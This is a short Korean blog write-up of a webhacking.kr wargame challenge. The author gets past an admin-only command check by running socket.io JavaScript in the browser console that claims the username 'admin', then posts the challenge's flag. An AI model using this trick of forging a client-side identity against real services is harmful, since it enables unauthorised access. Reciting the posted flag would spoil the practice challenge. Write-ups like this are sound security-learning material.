반응형
들어가면 흰 화면과 아래에 send버튼이 보임을 확인할 수 있다.
cmd로 되어 있어, ls와 pwd, flag를 send해봤다.
Admin만 된다고 하니 코드를 아래와 같이 바꿔봤다.
바꾼 후 flag를 넣었는데도 풀리지 않았다.
콘솔 창에
var username = "admin";
var socket = io();
socket.emit('cmd',username+":"+'flag');
socket.on('cmd', function(msg){
$('#messages').append($('<li>').text(msg));
});
를 쳐줬다.
대충 필요없는 부분만 버리고 쳤다.
근데 username : flag만 수정했다면 그냥 콘솔창에 코드 그대로 넣어도 된다.
입력하는 부분에 아무거나 쳤더니 위와 같이 나왔다.
auth에 flag{do_you_know_about_darkhotel}를 넣어 문제를 해결했다.
끝!!
반응형
'웹해킹' 카테고리의 다른 글
| webhacking.kr(old) 45번 (0) | 2020.05.13 |
|---|---|
| webhacking.kr(old) 34번 (0) | 2020.04.15 |
| webhacking.kr(old) 39번 (0) | 2020.04.13 |
| webhacking.kr(old) 18번 (0) | 2020.04.12 |
| webhacking.kr(old) 10번 (0) | 2020.04.04 |
